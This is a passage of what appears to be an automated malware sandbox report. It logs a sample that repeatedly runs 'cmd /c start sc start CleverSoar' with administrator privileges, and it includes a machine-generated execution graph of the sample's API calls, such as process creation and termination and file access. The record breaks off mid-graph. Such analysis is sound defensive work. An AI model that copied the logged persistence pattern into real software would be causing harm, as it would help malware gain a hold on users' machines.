                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:22:52:14
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:779
                              Total number of Limit Nodes:10
                              execution_graph 100237 6c854a27 100238 6c854a5d _strlen 100237->100238 100239 6c86639e 100238->100239 100240 6c855b6f 100238->100240 100241 6c855b58 100238->100241 100245 6c855b09 _Yarn 100238->100245 100369 6c9d0130 18 API calls 2 library calls 100239->100369 100244 6c9c6a43 std::_Facet_Register 4 API calls 100240->100244 100355 6c9c6a43 100241->100355 100244->100245 100328 6c9baec0 100245->100328 100248 6c855bad std::ios_base::_Ios_base_dtor 100248->100239 100251 6c859ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100248->100251 100334 6c9c4ff0 CreateProcessA 100248->100334 100249 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100249->100251 100250 6c9baec0 2 API calls 100250->100251 100251->100239 100251->100249 100251->100250 100252 6c85a292 Sleep 100251->100252 100271 6c85e619 100251->100271 100294 6c859bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100252->100294 100253 6c856624 100256 6c9c6a43 std::_Facet_Register 4 API calls 100253->100256 100254 6c85660d 100255 6c9c6a43 std::_Facet_Register 4 API calls 100254->100255 100262 6c8565bc _Yarn _strlen 100255->100262 100256->100262 100257 6c8561cb _strlen 100257->100239 100257->100253 100257->100254 100257->100262 100258 6c9c4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100258->100294 100259 6c859bbd GetCurrentProcess TerminateProcess 100259->100251 100260 6c8663b2 100370 6c8415e0 18 API calls std::ios_base::_Ios_base_dtor 100260->100370 100262->100260 100264 6c856970 100262->100264 100265 6c856989 100262->100265 100268 6c856920 _Yarn 100262->100268 100263 6c8664f8 100266 6c9c6a43 std::_Facet_Register 4 API calls 100264->100266 100267 6c9c6a43 std::_Facet_Register 4 API calls 100265->100267 100266->100268 100267->100268 100338 6c9c5960 100268->100338 100270 6c85f243 CreateFileA 100287 6c85f2a7 100270->100287 100271->100270 100272 6c8569d6 std::ios_base::_Ios_base_dtor _strlen 100272->100239 100273 
6c856dd2 100272->100273 100274 6c856dbb 100272->100274 100282 6c856d69 _Yarn _strlen 100272->100282 100277 6c9c6a43 std::_Facet_Register 4 API calls 100273->100277 100276 6c9c6a43 std::_Facet_Register 4 API calls 100274->100276 100275 6c8602ca 100276->100282 100277->100282 100278 6c9c5960 104 API calls 100278->100294 100279 6c857427 100283 6c9c6a43 std::_Facet_Register 4 API calls 100279->100283 100280 6c857440 100281 6c9c6a43 std::_Facet_Register 4 API calls 100280->100281 100284 6c8573da _Yarn 100281->100284 100282->100260 100282->100279 100282->100280 100282->100284 100283->100284 100285 6c9c5960 104 API calls 100284->100285 100288 6c85748d std::ios_base::_Ios_base_dtor _strlen 100285->100288 100286 6c8602ac GetCurrentProcess TerminateProcess 100286->100275 100287->100275 100287->100286 100288->100239 100289 6c857991 100288->100289 100290 6c8579a8 100288->100290 100293 6c857940 _Yarn _strlen 100288->100293 100291 6c9c6a43 std::_Facet_Register 4 API calls 100289->100291 100292 6c9c6a43 std::_Facet_Register 4 API calls 100290->100292 100291->100293 100292->100293 100293->100260 100295 6c857de2 100293->100295 100296 6c857dc9 100293->100296 100299 6c857d7c _Yarn 100293->100299 100294->100239 100294->100251 100294->100258 100294->100259 100294->100260 100294->100278 100304 6c9c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100294->100304 100298 6c9c6a43 std::_Facet_Register 4 API calls 100295->100298 100297 6c9c6a43 std::_Facet_Register 4 API calls 100296->100297 100297->100299 100298->100299 100300 6c9c5960 104 API calls 100299->100300 100301 6c857e2f std::ios_base::_Ios_base_dtor _strlen 100300->100301 100301->100239 100302 6c8585bf 100301->100302 100303 6c8585a8 100301->100303 100312 6c858556 _Yarn _strlen 100301->100312 100306 6c9c6a43 std::_Facet_Register 4 API calls 100302->100306 100305 6c9c6a43 std::_Facet_Register 4 API calls 100303->100305 100304->100294 100305->100312 100306->100312 100307 
6c858983 100310 6c9c6a43 std::_Facet_Register 4 API calls 100307->100310 100308 6c85896a 100309 6c9c6a43 std::_Facet_Register 4 API calls 100308->100309 100311 6c85891d _Yarn 100309->100311 100310->100311 100313 6c9c5960 104 API calls 100311->100313 100312->100260 100312->100307 100312->100308 100312->100311 100314 6c8589d0 std::ios_base::_Ios_base_dtor _strlen 100313->100314 100314->100239 100315 6c858f36 100314->100315 100316 6c858f1f 100314->100316 100319 6c858ecd _Yarn _strlen 100314->100319 100318 6c9c6a43 std::_Facet_Register 4 API calls 100315->100318 100317 6c9c6a43 std::_Facet_Register 4 API calls 100316->100317 100317->100319 100318->100319 100319->100260 100320 6c859354 100319->100320 100321 6c85936d 100319->100321 100324 6c859307 _Yarn 100319->100324 100322 6c9c6a43 std::_Facet_Register 4 API calls 100320->100322 100323 6c9c6a43 std::_Facet_Register 4 API calls 100321->100323 100322->100324 100323->100324 100325 6c9c5960 104 API calls 100324->100325 100327 6c8593ba std::ios_base::_Ios_base_dtor 100325->100327 100326 6c9c4ff0 4 API calls 100326->100251 100327->100239 100327->100326 100329 6c9baed6 FindFirstFileA 100328->100329 100330 6c9baed4 100328->100330 100331 6c9baf10 100329->100331 100330->100329 100332 6c9baf14 FindClose 100331->100332 100333 6c9baf72 100331->100333 100332->100331 100333->100248 100335 6c9c50ca 100334->100335 100336 6c9c5080 WaitForSingleObject CloseHandle CloseHandle 100335->100336 100337 6c9c50e3 100335->100337 100336->100335 100337->100257 100339 6c9c59b7 100338->100339 100371 6c9c5ff0 100339->100371 100341 6c9c59c8 100390 6c866ba0 100341->100390 100344 6c9c5a9f std::ios_base::_Ios_base_dtor 100347 6c88e010 67 API calls 100344->100347 100345 6c9c59ec 100348 6c9c5a54 100345->100348 100354 6c9c5a67 100345->100354 100409 6c9c6340 100345->100409 100417 6c8a2000 100345->100417 100350 6c9c5ae2 std::ios_base::_Ios_base_dtor 100347->100350 100427 6c9c5b90 100348->100427 100350->100272 100352 6c9c5a5c 100448 6c867090 100352->100448 
100442 6c88e010 100354->100442 100356 6c9c6a48 100355->100356 100357 6c9c6a62 100356->100357 100360 6c9c6a64 std::_Facet_Register 100356->100360 100907 6c9cf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100356->100907 100357->100245 100359 6c9c78c3 std::_Facet_Register 100911 6c9c9379 RaiseException 100359->100911 100360->100359 100908 6c9c9379 RaiseException 100360->100908 100362 6c9c80bc IsProcessorFeaturePresent 100368 6c9c80e1 100362->100368 100364 6c9c7883 100909 6c9c9379 RaiseException 100364->100909 100366 6c9c78a3 std::invalid_argument::invalid_argument 100910 6c9c9379 RaiseException 100366->100910 100368->100245 100370->100263 100372 6c9c6025 100371->100372 100461 6c892020 100372->100461 100374 6c9c60c6 100375 6c9c6a43 std::_Facet_Register 4 API calls 100374->100375 100376 6c9c60fe 100375->100376 100478 6c9c7327 100376->100478 100378 6c9c6112 100490 6c891d90 100378->100490 100381 6c9c61ec 100381->100341 100383 6c9c6226 100498 6c8926e0 24 API calls 4 library calls 100383->100498 100385 6c9c6238 100499 6c9c9379 RaiseException 100385->100499 100387 6c9c624d 100388 6c88e010 67 API calls 100387->100388 100389 6c9c625f 100388->100389 100389->100341 100391 6c866bd5 100390->100391 100392 6c892020 52 API calls 100391->100392 100393 6c866c68 100392->100393 100394 6c9c6a43 std::_Facet_Register 4 API calls 100393->100394 100395 6c866ca0 100394->100395 100396 6c9c7327 43 API calls 100395->100396 100397 6c866cb4 100396->100397 100398 6c891d90 89 API calls 100397->100398 100399 6c866d5d 100398->100399 100400 6c866d8e 100399->100400 100809 6c892250 30 API calls 100399->100809 100400->100345 100402 6c866dc8 100810 6c8926e0 24 API calls 4 library calls 100402->100810 100404 6c866dda 100811 6c9c9379 RaiseException 100404->100811 100406 6c866def 100407 6c88e010 67 API calls 100406->100407 100408 6c866e0f 100407->100408 100408->100345 100410 6c9c638d 100409->100410 100812 6c9c65a0 100410->100812 100413 6c9c647c 100413->100345 100416 6c9c63a5 100416->100413 
100830 6c892250 30 API calls 100416->100830 100831 6c8926e0 24 API calls 4 library calls 100416->100831 100832 6c9c9379 RaiseException 100416->100832 100418 6c8a203f 100417->100418 100422 6c8a2053 100418->100422 100841 6c893560 32 API calls std::_Xinvalid_argument 100418->100841 100420 6c8a210e 100424 6c8a2121 100420->100424 100842 6c8937e0 32 API calls std::_Xinvalid_argument 100420->100842 100422->100420 100843 6c892250 30 API calls 100422->100843 100844 6c8926e0 24 API calls 4 library calls 100422->100844 100845 6c9c9379 RaiseException 100422->100845 100424->100345 100428 6c9c5b9e 100427->100428 100432 6c9c5bd1 100427->100432 100846 6c8901f0 100428->100846 100430 6c9c5c83 100430->100352 100432->100430 100850 6c892250 30 API calls 100432->100850 100434 6c9d0b18 67 API calls 100434->100432 100435 6c9c5cae 100851 6c892340 24 API calls 100435->100851 100437 6c9c5cbe 100852 6c9c9379 RaiseException 100437->100852 100439 6c9c5cc9 100440 6c88e010 67 API calls 100439->100440 100441 6c9c5d22 std::ios_base::_Ios_base_dtor 100440->100441 100441->100352 100443 6c88e04b 100442->100443 100444 6c8901f0 64 API calls 100443->100444 100447 6c88e0a3 100443->100447 100445 6c88e098 100444->100445 100446 6c9d0b18 67 API calls 100445->100446 100446->100447 100447->100344 100449 6c86709e 100448->100449 100452 6c8670d1 100448->100452 100451 6c8901f0 64 API calls 100449->100451 100450 6c867183 100450->100354 100453 6c8670c4 100451->100453 100452->100450 100904 6c892250 30 API calls 100452->100904 100455 6c9d0b18 67 API calls 100453->100455 100455->100452 100456 6c8671ae 100905 6c892340 24 API calls 100456->100905 100458 6c8671be 100906 6c9c9379 RaiseException 100458->100906 100460 6c8671c9 100462 6c9c6a43 std::_Facet_Register 4 API calls 100461->100462 100463 6c89207e 100462->100463 100464 6c9c7327 43 API calls 100463->100464 100465 6c892092 100464->100465 100500 6c892f60 42 API calls 4 library calls 100465->100500 100467 6c8920c8 100468 6c89210d 100467->100468 100469 6c892136 
100467->100469 100470 6c892120 100468->100470 100501 6c9c6f8e 9 API calls 2 library calls 100468->100501 100502 6c892250 30 API calls 100469->100502 100470->100374 100473 6c89215b 100503 6c892340 24 API calls 100473->100503 100475 6c892171 100504 6c9c9379 RaiseException 100475->100504 100477 6c89217c 100477->100374 100479 6c9c7333 __EH_prolog3 100478->100479 100505 6c9c6eb5 100479->100505 100484 6c9c7351 100519 6c9c73ba 39 API calls std::locale::_Setgloballocale 100484->100519 100486 6c9c73ac 100486->100378 100487 6c9c7359 100520 6c9c71b1 HeapFree GetLastError _Yarn 100487->100520 100489 6c9c736f 100511 6c9c6ee6 100489->100511 100491 6c891ddc 100490->100491 100492 6c891dc7 100490->100492 100525 6c9c7447 100491->100525 100492->100381 100497 6c892250 30 API calls 100492->100497 100496 6c891e82 100497->100383 100498->100385 100499->100387 100500->100467 100501->100470 100502->100473 100503->100475 100504->100477 100506 6c9c6ecb 100505->100506 100507 6c9c6ec4 100505->100507 100510 6c9c6ec9 100506->100510 100522 6c9c858b EnterCriticalSection 100506->100522 100521 6c9d03cd 6 API calls std::_Lockit::_Lockit 100507->100521 100510->100489 100518 6c9c7230 6 API calls 2 library calls 100510->100518 100512 6c9d03db 100511->100512 100513 6c9c6ef0 100511->100513 100524 6c9d03b6 LeaveCriticalSection 100512->100524 100517 6c9c6f03 100513->100517 100523 6c9c8599 LeaveCriticalSection 100513->100523 100516 6c9d03e2 100516->100486 100517->100486 100518->100484 100519->100487 100520->100489 100521->100510 100522->100510 100523->100517 100524->100516 100527 6c9c7450 100525->100527 100526 6c891dea 100526->100492 100533 6c9cc563 18 API calls __cftoe 100526->100533 100527->100526 100534 6c9cfd4a 100527->100534 100529 6c9c749c 100529->100526 100545 6c9cfa58 65 API calls 100529->100545 100531 6c9c74b7 100531->100526 100546 6c9d0b18 100531->100546 100533->100496 100535 6c9cfd55 __wsopen_s 100534->100535 100536 6c9cfd68 100535->100536 100537 6c9cfd88 100535->100537 100571 6c9d0120 18 API calls 
__cftoe 100536->100571 100544 6c9cfd78 100537->100544 100557 6c9dae0c 100537->100557 100544->100529 100545->100531 100547 6c9d0b24 __wsopen_s 100546->100547 100548 6c9d0b2e 100547->100548 100549 6c9d0b43 100547->100549 100695 6c9d0120 18 API calls __cftoe 100548->100695 100554 6c9d0b3e 100549->100554 100680 6c9cc5a9 EnterCriticalSection 100549->100680 100552 6c9d0b60 100681 6c9d0b9c 100552->100681 100554->100526 100555 6c9d0b6b 100696 6c9d0b92 LeaveCriticalSection 100555->100696 100558 6c9dae18 __wsopen_s 100557->100558 100573 6c9d039f EnterCriticalSection 100558->100573 100560 6c9dae26 100574 6c9daeb0 100560->100574 100565 6c9daf72 100566 6c9db091 100565->100566 100598 6c9db114 100566->100598 100569 6c9cfdcc 100572 6c9cfdf5 LeaveCriticalSection 100569->100572 100571->100544 100572->100544 100573->100560 100582 6c9daed3 100574->100582 100575 6c9dae33 100588 6c9dae6c 100575->100588 100576 6c9daf2b 100593 6c9d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100576->100593 100579 6c9daf34 100594 6c9d47bb HeapFree GetLastError _free 100579->100594 100581 6c9daf3d 100581->100575 100595 6c9d6c1f 6 API calls std::_Lockit::_Lockit 100581->100595 100582->100575 100582->100576 100582->100582 100591 6c9cc5a9 EnterCriticalSection 100582->100591 100592 6c9cc5bd LeaveCriticalSection 100582->100592 100584 6c9daf5c 100596 6c9cc5a9 EnterCriticalSection 100584->100596 100587 6c9daf6f 100587->100575 100597 6c9d03b6 LeaveCriticalSection 100588->100597 100590 6c9cfda3 100590->100544 100590->100565 100591->100582 100592->100582 100593->100579 100594->100581 100595->100584 100596->100587 100597->100590 100599 6c9db133 100598->100599 100600 6c9db146 100599->100600 100602 6c9db15b 100599->100602 100614 6c9d0120 18 API calls __cftoe 100600->100614 100603 6c9db27b 100602->100603 100615 6c9e3ea8 37 API calls __cftoe 100602->100615 100604 6c9db0a7 100603->100604 100618 6c9d0120 18 API calls __cftoe 100603->100618 100604->100569 100611 6c9e3fde 
100604->100611 100607 6c9db2cb 100607->100603 100616 6c9e3ea8 37 API calls __cftoe 100607->100616 100609 6c9db2e9 100609->100603 100617 6c9e3ea8 37 API calls __cftoe 100609->100617 100619 6c9e4396 100611->100619 100614->100604 100615->100607 100616->100609 100617->100603 100618->100604 100620 6c9e43a2 __wsopen_s 100619->100620 100621 6c9e43d4 100620->100621 100622 6c9e43a9 100620->100622 100628 6c9e3ffe 100621->100628 100637 6c9d0120 18 API calls __cftoe 100622->100637 100627 6c9e3ff9 100627->100569 100639 6c9d06cb 100628->100639 100633 6c9e4034 100635 6c9e4066 100633->100635 100679 6c9d47bb HeapFree GetLastError _free 100633->100679 100638 6c9e442b LeaveCriticalSection __wsopen_s 100635->100638 100637->100627 100638->100627 100640 6c9cbceb __cftoe 37 API calls 100639->100640 100641 6c9d06dd 100640->100641 100642 6c9d06ef 100641->100642 100643 6c9d69d5 __wsopen_s 5 API calls 100641->100643 100644 6c9cbdf6 100642->100644 100643->100642 100645 6c9cbe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100644->100645 100646 6c9cbe0e 100645->100646 100646->100633 100647 6c9e406c 100646->100647 100648 6c9e44ec __wsopen_s 18 API calls 100647->100648 100649 6c9e4089 100648->100649 100650 6c9e160c __wsopen_s 14 API calls 100649->100650 100654 6c9e409e __dosmaperr 100649->100654 100651 6c9e40bc 100650->100651 100652 6c9e4457 __wsopen_s CreateFileW 100651->100652 100651->100654 100659 6c9e4115 100652->100659 100653 6c9e4192 GetFileType 100655 6c9e419d GetLastError 100653->100655 100656 6c9e41e4 100653->100656 100654->100633 100658 6c9cf9f2 __dosmaperr 100655->100658 100662 6c9e17b0 __wsopen_s SetStdHandle 100656->100662 100657 6c9e4167 GetLastError 100657->100654 100660 6c9e41ab CloseHandle 100658->100660 100659->100653 100659->100657 100661 6c9e4457 __wsopen_s CreateFileW 100659->100661 100660->100654 100675 6c9e41d4 100660->100675 100663 6c9e415a 100661->100663 100664 6c9e4205 100662->100664 100663->100653 100663->100657 100665 6c9e4251 100664->100665 
100667 6c9e4666 __wsopen_s 70 API calls 100664->100667 100666 6c9e4710 __wsopen_s 70 API calls 100665->100666 100669 6c9e4258 100665->100669 100668 6c9e4286 100666->100668 100667->100665 100668->100669 100670 6c9e4294 100668->100670 100671 6c9db925 __wsopen_s 21 API calls 100669->100671 100670->100654 100672 6c9e4310 CloseHandle 100670->100672 100671->100654 100673 6c9e4457 __wsopen_s CreateFileW 100672->100673 100674 6c9e433b 100673->100674 100674->100675 100676 6c9e4345 GetLastError 100674->100676 100675->100654 100677 6c9e4351 __dosmaperr 100676->100677 100678 6c9e171f __wsopen_s SetStdHandle 100677->100678 100678->100675 100679->100635 100680->100552 100682 6c9d0bbe 100681->100682 100683 6c9d0ba9 100681->100683 100687 6c9d0bb9 100682->100687 100697 6c9d0cb9 100682->100697 100719 6c9d0120 18 API calls __cftoe 100683->100719 100687->100555 100691 6c9d0be1 100712 6c9db898 100691->100712 100693 6c9d0be7 100693->100687 100720 6c9d47bb HeapFree GetLastError _free 100693->100720 100695->100554 100696->100554 100698 6c9d0bd3 100697->100698 100699 6c9d0cd1 100697->100699 100703 6c9d873e 100698->100703 100699->100698 100700 6c9d9c60 18 API calls 100699->100700 100701 6c9d0cef 100700->100701 100721 6c9dbb6c 100701->100721 100704 6c9d0bdb 100703->100704 100705 6c9d8755 100703->100705 100707 6c9d9c60 100704->100707 100705->100704 100777 6c9d47bb HeapFree GetLastError _free 100705->100777 100708 6c9d9c6c 100707->100708 100709 6c9d9c81 100707->100709 100778 6c9d0120 18 API calls __cftoe 100708->100778 100709->100691 100711 6c9d9c7c 100711->100691 100713 6c9db8be 100712->100713 100717 6c9db8a9 __dosmaperr 100712->100717 100714 6c9db8e5 100713->100714 100716 6c9db907 __dosmaperr 100713->100716 100779 6c9db9c1 100714->100779 100787 6c9d0120 18 API calls __cftoe 100716->100787 100717->100693 100719->100687 100720->100687 100723 